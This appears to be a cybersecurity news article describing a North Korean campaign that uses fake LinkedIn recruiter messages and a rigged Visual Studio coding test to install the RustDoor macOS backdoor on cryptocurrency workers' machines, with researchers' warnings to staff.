Cybersecurity analysts continue to alert about North Korean hackers targeting potential victims on LinkedIn using RustDoor malware.
The most recent notification is from Jamf Threat Labs, which identified an intrusion attempt where an individual was messaged on the professional networking platform under the guise of a recruiter representing an authentic decentralized digital currency exchange (DEX) known as STON.fi.
The malevolent cyber operations are part of a diversified offensive launched by cyber threat actors sponsored by the Democratic People’s Republic of Korea (DPRK) to penetrate networks relevant to them pretending to conduct interviews or coding tasks.
The financial and digital currency sectors are top priorities for the state-backed adversaries aiming to earn illegal profits and fulfill changing objectives based on the regime’s concerns.
These breaches materialize in the form of “tailored, hard-to-spot social engineering campaigns” aimed at staff in decentralized finance (“DeFi”), digital currency, and similar companies, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in a notice.
One of the notable signs of North Korean social engineering actions involves requests to execute code or install applications on corporate-owned devices, or devices with access to a company’s internal network.
Another point to note is that such attacks also include “requests to perform a ‘pre-job test’ or debugging task that entails running unconventional or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.”
Instances demonstrating such tactics have been thoroughly recorded in recent times, emphasizing a continuous enhancement of the tools utilized in these operations against targets.
The latest attack sequence identified by Jamf involves deceiving the victim into downloading a manipulated Visual Studio project as part of a so-called coding challenge that includes bash commands to fetch two distinct second-stage payloads (“VisualStudioHelper” and “zsh_env”) with similar functions.
This second-stage malware is RustDoor, also known as Thiefbucket by the company. Currently, none of the anti-malware engines have red-flagged the zipped coding test file as harmful. It was uploaded to the VirusTotal platform on August 7, 2024.
“The config files embedded within the two distinct malware samples indicate that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file,” stated researchers Jaron Bradley and Ferdous Saljooki.
RustDoor, a macOS backdoor, was initially discussed by Bitdefender in February 2024 in relation to a malware scheme targeting digital currency companies. A subsequent investigation by S2W revealed a Golang variant named GateDoor aimed at infecting Windows machines.
The revelations from Jamf are significant not only because they attribute the malware to North Korean hackers for the first time but also because the malware is coded in Objective-C.
VisualStudioHelper is also intended to function as a data thief by collecting files specified in the setup, but only after asking the user to enter their system password by posing as a request originating from the Visual Studio app to prevent suspicion.
Both payloads, however, operate as backdoors and communicate with two different servers for command-and-control (C2) purposes.
“Threat actors persist in devising new methods to target individuals in the crypto sector,” highlighted the researchers. “It’s vital to educate your staff, including developers, to be cautious when interacting with individuals on social media asking them to run any kind of software.
“These social engineering tactics by the DPRK are employed by individuals fluent in English who enter the conversation after extensive research on their target.”
About Author
